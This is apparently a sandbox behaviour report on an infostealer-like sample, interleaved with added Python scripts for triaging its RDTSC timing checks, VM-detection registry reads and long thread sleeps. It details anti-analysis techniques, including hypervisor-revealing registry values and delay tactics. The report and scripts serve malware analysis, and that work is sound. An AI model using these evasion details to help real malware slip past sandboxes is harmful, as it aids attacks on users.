Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5000B12 second address: 5000B18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5000B18 second address: 5000B1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5000B1C second address: 5000B20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5000B20 second address: 5000BBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 jmp 00007FBF8C4F208Dh 0x0000000e xchg eax, ebx 0x0000000f pushad 0x00000010 jmp 00007FBF8C4F208Ch 0x00000015 pushfd 0x00000016 jmp 00007FBF8C4F2092h 0x0000001b add esi, 0CD05798h 0x00000021 jmp 00007FBF8C4F208Bh 0x00000026 popfd 0x00000027 popad 0x00000028 push eax 0x00000029 jmp 00007FBF8C4F2099h 0x0000002e xchg eax, ebx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 push edx 0x00000033 pop esi 0x00000034 pushfd 0x00000035 jmp 00007FBF8C4F208Fh 0x0000003a or cx, DDBEh 0x0000003f jmp 00007FBF8C4F2099h 0x00000044 popfd 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5000BBA second address: 5000C3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FBF8C4F2A57h 0x00000009 and ah, FFFFFFCEh 0x0000000c jmp 00007FBF8C4F2A59h 0x00000011 popfd 0x00000012 jmp 00007FBF8C4F2A50h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push dword ptr [ebp+14h] 0x0000001d pushad 0x0000001e mov edx, esi 0x00000020 pushfd 0x00000021 jmp 00007FBF8C4F2A4Ah 0x00000026 add si, 0B78h 0x0000002b jmp 00007FBF8C4F2A4Bh 0x00000030 popfd 0x00000031 popad 0x00000032 push dword ptr [ebp+10h] 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007FBF8C4F2A50h 0x0000003e rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5000C3F second address: 5000C45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5000CC5 second address: 5000CCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5000CCB second address: 5000CCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5010B00 second address: 5010B06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5010B06 second address: 5010B0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5010B0A second address: 5010B2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov bl, 4Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 mov bx, cx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5090733 second address: 5090739 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5090739 second address: 509073D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 509073D second address: 509075B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov di, ax 0x0000000f jmp 00007FBF8C4F208Eh 0x00000014 popad 0x00000015 rdtsc
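What the interceptor entries above record, and how to triage them: each line is one pair of consecutive `rdtsc` executions, giving the address of both reads and the instructions that ran between them. Reading the listings, the timestamp that `rdtsc` leaves in EDX:EAX is bracketed by `push eax`/`push edx` and `pop edx`/`pop eax` (or `pushad`/`popad`) and is never subtracted from or compared with an earlier reading before the next `rdtsc` overwrites it. That is the shape of protector-inserted junk (dense `rdtsc` reads also slow down hypervisors that trap the instruction) rather than of an explicit delta check; a timing check that could actually tell a hypervisor apart has to consume those two registers. The script below is an added example, not part of the report: it parses the lines, classifies the instructions, and runs a small liveness pass that reports whether the timestamp is read before being overwritten. It embeds five lines copied from the entries above plus one constructed line (labelled in the code) showing what a genuine check looks like. Limitations: `call` targets are not followed, partial-register writes such as `mov ax, di` are ignored, and `pushad`/`popad` nesting is only tracked within one line.

```python
"""Parse Joe Sandbox 'RDTSC instruction interceptor' lines and check whether the
RDTSC result is actually consumed. Added example, not part of the report.

Each line records two consecutive RDTSC executions and the instructions between
them. After RDTSC the timestamp sits in EDX:EAX; a timing check must read those
registers (copy, subtract, compare) before something overwrites them.
"""
import re
from dataclasses import dataclass

LINE_RE = re.compile(
    r"^Source: (?P<src>.+?) RDTSC instruction interceptor: First address: "
    r"(?P<first>[0-9A-Fa-f]+) second address: (?P<second>[0-9A-Fa-f]+) "
    r"instructions: (?P<body>.+)$"
)
# One "0x<offset> <mnemonic> <operands>" item; operands may contain spaces and commas.
INSN_RE = re.compile(r"0x(?P<off>[0-9A-Fa-f]{8}) (?P<text>.+?)(?= 0x[0-9A-Fa-f]{8} |$)")
REG_RE = re.compile(r"\b(eax|edx)\b")  # full-width timer registers only
SCAFFOLD = {"pushad", "popad", "pushfd", "popfd", "nop"}
READS_ALL = {"add", "adc", "sub", "sbb", "xor", "and", "or", "cmp", "test",
             "ror", "rol", "shr", "shl", "sar", "xchg"}
MOVES = {"mov", "movzx", "movsx", "lea"}


@dataclass
class Insn:
    offset: int
    mnemonic: str
    operands: list


def parse_line(line):
    """Returns {'src', 'first', 'second', 'insns'} or None for non-RDTSC lines."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    insns = []
    for im in INSN_RE.finditer(m["body"]):
        parts = im["text"].split(None, 1)
        ops = [o.strip() for o in parts[1].split(",")] if len(parts) > 1 else []
        insns.append(Insn(int(im["off"], 16), parts[0].lower(), ops))
    return {"src": m["src"], "first": int(m["first"], 16),
            "second": int(m["second"], 16), "insns": insns}


def is_scaffold(ins):
    """push/pop of the timer registers plus pushad/popad/pushfd/popfd/nop."""
    return ins.mnemonic in SCAFFOLD or (
        ins.mnemonic in ("push", "pop") and bool(ins.operands) and ins.operands[0] in ("eax", "edx"))


def timestamp_consumed(insns):
    """True if EAX or EDX, as written by the leading RDTSC, is read before being
    overwritten. A popad at depth 0 (closing a pushad from an earlier line) is taken
    to restore all registers; instructions inside pushad/popad are register-transparent."""
    live = {"eax": True, "edx": True}
    depth = 0
    for ins in insns[1:]:  # insns[0] is the leading rdtsc
        m, ops = ins.mnemonic, ins.operands
        if m == "rdtsc":
            break  # closing read of this pair
        if m == "pushad":
            depth += 1
        elif m == "popad":
            if depth:
                depth -= 1
            else:
                live = {"eax": False, "edx": False}
        elif depth:
            continue  # inside pushad/popad: registers are restored afterwards
        elif m == "pop":
            for r in REG_RE.findall(ops[0] if ops else ""):
                live[r] = False
        elif m in READS_ALL:
            if any(live[r] for op in ops for r in REG_RE.findall(op)):
                return True
        elif m in MOVES and len(ops) == 2:
            if any(live[r] for r in REG_RE.findall(ops[1])):
                return True  # source operand reads the timestamp
            if ops[0] in live:
                live[ops[0]] = False  # plain register destination overwritten
    return False


def summarize(lines):
    rows = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        body = rec["insns"]
        rows.append({"first": rec["first"], "second": rec["second"],
                     "span": rec["second"] - rec["first"], "insns": len(body),
                     "scaffold": sum(1 for i in body if is_scaffold(i)),
                     "branches": [i.mnemonic for i in body if i.mnemonic.startswith("j") and i.mnemonic != "jmp"],
                     "timestamp_read": timestamp_consumed(body)})
    return rows


# Five lines copied from the report, then one CONSTRUCTED line (not from the report)
# showing a pair in which the timestamp is copied out for a later subtraction.
SAMPLE_LINES = [
    r"Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50606E7 second address: 50606ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc",
    r"Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50606ED second address: 506072A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [778165FCh] 0x0000000d jmp 00007FBF8C4F2A59h 0x00000012 test eax, eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push edx 0x00000018 pop esi 0x00000019 jmp 00007FBF8C4F2A4Fh 0x0000001e popad 0x0000001f rdtsc",
    r"Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50607E0 second address: 50607E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc",
    r"Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 50102CE second address: 5010306 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBF8C4F2A57h 0x00000008 movzx eax, bx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e cmp dword ptr [esi+08h], DDEEDDEEh 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FBF8C4F2A4Dh 0x0000001e rdtsc",
    r"Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 5000A38 second address: 5000A62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FBFFEC78387h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FBF8C4F2A4Dh 0x00000016 rdtsc",
    r"Source: constructed.exe RDTSC instruction interceptor: First address: 401000 second address: 401005 instructions: 0x00000000 rdtsc 0x00000002 mov esi, eax 0x00000004 rdtsc",
]

if __name__ == "__main__":
    for r in summarize(SAMPLE_LINES):
        print(f"{r['first']:08X}->{r['second']:08X} insns={r['insns']:2d} scaffold={r['scaffold']:2d} "
              f"jcc={r['branches']} timestamp_read={r['timestamp_read']}")
```

For the five report lines the timestamp is never read, while the constructed pair reports `timestamp_read=True`; run the script over the full interceptor block of a report to see whether any pair breaks the pattern, since a single consuming pair is the one worth disassembling.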
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Special instruction interceptor: First address: 6DEB9A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Special instruction interceptor: First address: 6DEC64 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Special instruction interceptor: First address: 88958E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Special instruction interceptor: First address: 6DC222 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Special instruction interceptor: First address: 917DD5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: C5EB9A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: C5EC64 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: E0958E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: C5C222 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: E97DD5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
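The three registry values read by explorti.exe are the usual display-adapter and BIOS strings that give away VMware or VirtualBox on an un-hardened guest: {4d36e968-e325-11ce-bfc1-08002be10318} is the Display adapters setup class, so `0000\DriverDesc` is the name of the first video driver, and the two `HARDWARE\DESCRIPTION\System` values are the BIOS strings the firmware reports. The report shows which values are read but not what they are compared with. The script below is an added example rather than code recovered from the sample: it reads the same three values and matches them against a list of hypervisor vendor substrings that is an assumption about what such checks typically look for. Run it on an analysis VM to see whether these values leak the hypervisor. The edition-name strings listed further down in this section (for example "Windows 2012 Server Standard without Hyper-V") read as a table of Windows product editions, not as evidence of a hypervisor check.

```python
"""Do the three registry values read by explorti.exe leak a hypervisor?

Added example, not code recovered from the sample. The report lists which values
are queried; the vendor substrings below are an assumption about what a VM check
typically matches on, not strings taken from the binary.
"""
import sys

# (key under HKEY_LOCAL_MACHINE, value name), exactly as the report lists them.
QUERIES = [
    (r"SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000", "DriverDesc"),
    (r"HARDWARE\DESCRIPTION\System", "SystemBiosVersion"),
    (r"HARDWARE\DESCRIPTION\System", "VideoBiosVersion"),
]

# Assumed marker list: common hypervisor artefacts, lower-cased for matching.
VM_MARKERS = ("vmware", "virtualbox", "vbox", "qemu", "bochs", "parallels",
              "hyper-v", "virtual machine")


def as_text(value):
    """SystemBiosVersion/VideoBiosVersion are REG_MULTI_SZ (a list of strings);
    DriverDesc is REG_SZ. Flatten both to one searchable string."""
    if isinstance(value, (list, tuple)):
        return " ".join(str(v) for v in value)
    return str(value)


def classify(values):
    """values maps (key, name) -> raw registry data.
    Returns [(key, name, marker)] for every value that contains a marker."""
    hits = []
    for (key, name), raw in values.items():
        text = as_text(raw).lower()
        for marker in VM_MARKERS:
            if marker in text:
                hits.append((key, name, marker))
                break
    return hits


def read_from_registry():
    """Windows only: read the same three values the sample reads."""
    import winreg  # only exists on Windows, so imported lazily
    out = {}
    for key, name in QUERIES:
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key) as handle:
                out[(key, name)] = winreg.QueryValueEx(handle, name)[0]
        except OSError as exc:
            out[(key, name)] = f"<unreadable: {exc}>"
    return out


# Constructed inputs (not read from any machine): what an un-hardened VMware
# guest might return, and what a guest with patched strings might return.
UNHARDENED = {
    (QUERIES[0][0], "DriverDesc"): "VMware SVGA 3D",
    (QUERIES[1][0], "SystemBiosVersion"): ["INTEL  - 6040000", "PhoenixBIOS 4.0 Release 6.0"],
    (QUERIES[2][0], "VideoBiosVersion"): ["VMware SVGA II"],
}
HARDENED = {
    (QUERIES[0][0], "DriverDesc"): "Intel(R) UHD Graphics 630",
    (QUERIES[1][0], "SystemBiosVersion"): ["DELL   - 1072009", "1.14.0"],
    (QUERIES[2][0], "VideoBiosVersion"): ["Intel Video BIOS"],
}

if __name__ == "__main__":
    values = read_from_registry() if sys.platform == "win32" else UNHARDENED
    hits = classify(values)
    for key, name, marker in hits:
        print(f"LEAK {name} under {key}: matched '{marker}'")
    if not hits:
        print("no hypervisor marker in the three values")
```

On a Windows analysis guest the script reads the live values; elsewhere it falls back to the constructed un-hardened set so the matching logic can be exercised offline.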
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Code function: 9_2_05080C45 rdtsc 9_2_05080C45
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 180000
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Window / User API: threadDelayed 483
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 3303
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 2138
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 856
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 379
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 3018
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Window / User API: threadDelayed 383
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\vcruntime140[1].dll
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\msvcp140[1].dll
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\softokn3[1].dll
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\freebl3[1].dll
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\nss3[1].dll
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\mozglue[1].dll
Source: C:\Users\user\Desktop\Zachv5lCuu.exe API coverage: 0.8 %
Source: C:\Users\user\Desktop\Zachv5lCuu.exe TID: 7520 Thread sleep count: 483 > 30
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7556 Thread sleep time: -48024s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 6512 Thread sleep count: 856 > 30
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 6512 Thread sleep time: -1712856s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 3284 Thread sleep count: 379 > 30
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 3284 Thread sleep time: -11370000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 2044 Thread sleep time: -1440000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 6512 Thread sleep count: 3018 > 30
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 6512 Thread sleep time: -6039018s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe TID: 2092 Thread sleep count: 383 > 30
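Turning the per-thread sleep lines above into numbers a triage analyst can act on: the report prints each thread's summed delay as a negative value with an `s` suffix. The sign is the relative-interval convention of NtDelayExecution, and the magnitudes divide by the call counts into round values (1712856 / 856 and 6039018 / 3018 both give 2001; 11370000 / 379 gives 30000), which is consistent with milliseconds and matches the `delay time: 30000` and `180000` entries nearby; milliseconds is therefore the assumption made below. Dividing total by count recovers the per-call delay (a loop sleeping about 2 s and another thread sleeping 30 s per call), which is what to look for in the binary, and the total says whether a fixed analysis window can outlast the stall. The script is an added example, not part of the report; the sample lines are copied from the entries above with the trailing link text dropped, and the ten-minute budget is an illustrative value, not a figure from the report.

```python
"""Aggregate Joe Sandbox 'Thread sleep count/time' lines per thread.

Added example, not part of the report. Assumption: the negative 'Ns' totals are
summed delays in milliseconds (the figures divide cleanly into 2001 and 30000 per
call); the report's own threshold in these lines is 30000, i.e. 30 s.
"""
import re
from collections import defaultdict

SLEEP_RE = re.compile(
    r"^Source: (?P<src>.+?) TID: (?P<tid>\d+) Thread sleep (?P<kind>count|time): "
    r"-?(?P<value>\d+)s? >=? -?\d+s?(?: Jump to behavior)?$"
)


def aggregate(lines, budget_ms=None):
    """One row per (image, tid): call count, total delay, per-call delay where both
    figures are present, and whether the total exceeds an analysis budget."""
    per = defaultdict(lambda: {"calls": 0, "total_ms": 0})
    for line in lines:
        m = SLEEP_RE.match(line.strip())
        if not m:
            continue  # not a sleep line; ignore
        image = m["src"].rsplit("\\", 1)[-1]  # keep the image name only
        bucket = per[(image, int(m["tid"]))]
        if m["kind"] == "count":
            bucket["calls"] += int(m["value"])
        else:
            bucket["total_ms"] += int(m["value"])
    rows = []
    for (image, tid), b in sorted(per.items()):
        calls, total = b["calls"], b["total_ms"]
        per_call = round(total / calls) if calls and total else None  # both lines needed
        rows.append({"image": image, "tid": tid, "calls": calls, "total_ms": total,
                     "per_call_ms": per_call,
                     "exceeds_budget": budget_ms is not None and total >= budget_ms})
    return rows


# Copied from the report (trailing "Jump to behavior" link text removed).
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\Zachv5lCuu.exe TID: 7520 Thread sleep count: 483 > 30",
    r"Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7556 Thread sleep time: -48024s >= -30000s",
    r"Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 6512 Thread sleep count: 856 > 30",
    r"Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 6512 Thread sleep time: -1712856s >= -30000s",
    r"Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 3284 Thread sleep count: 379 > 30",
    r"Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 3284 Thread sleep time: -11370000s >= -30000s",
    r"Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 2044 Thread sleep time: -1440000s >= -30000s",
    r"Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 6512 Thread sleep count: 3018 > 30",
    r"Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 6512 Thread sleep time: -6039018s >= -30000s",
    r"Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe TID: 2092 Thread sleep count: 383 > 30",
]

if __name__ == "__main__":
    BUDGET_MS = 10 * 60 * 1000  # illustrative ten-minute analysis window (assumed)
    for r in aggregate(SAMPLE_LINES, BUDGET_MS):
        print(f"{r['image']:16s} tid={r['tid']:5d} calls={r['calls']:5d} "
              f"total={r['total_ms'] / 60000:7.1f} min per_call={r['per_call_ms']} "
              f"exceeds_budget={r['exceeds_budget']}")
```

Threads that only have a count line (or only a time line) get `per_call_ms=None` rather than a guessed value; the two explorti.exe threads with both figures come out at about 2 s and 30 s per call, with totals of roughly 129 and 190 minutes.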
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCBC930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc, 0_2_6CCBC930
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 180000
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 2012 Server Standard without Hyper-V (core)
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Essential Server Solutions without Hyper-V
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: #Windows 10 Microsoft Hyper-V Server
Source: KKFHJJDH.0.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Microsoft Hyper-V Server
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Microsoft Hyper-V Server
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (full)
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (core)
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 2016 Server Standard without Hyper-V (core)
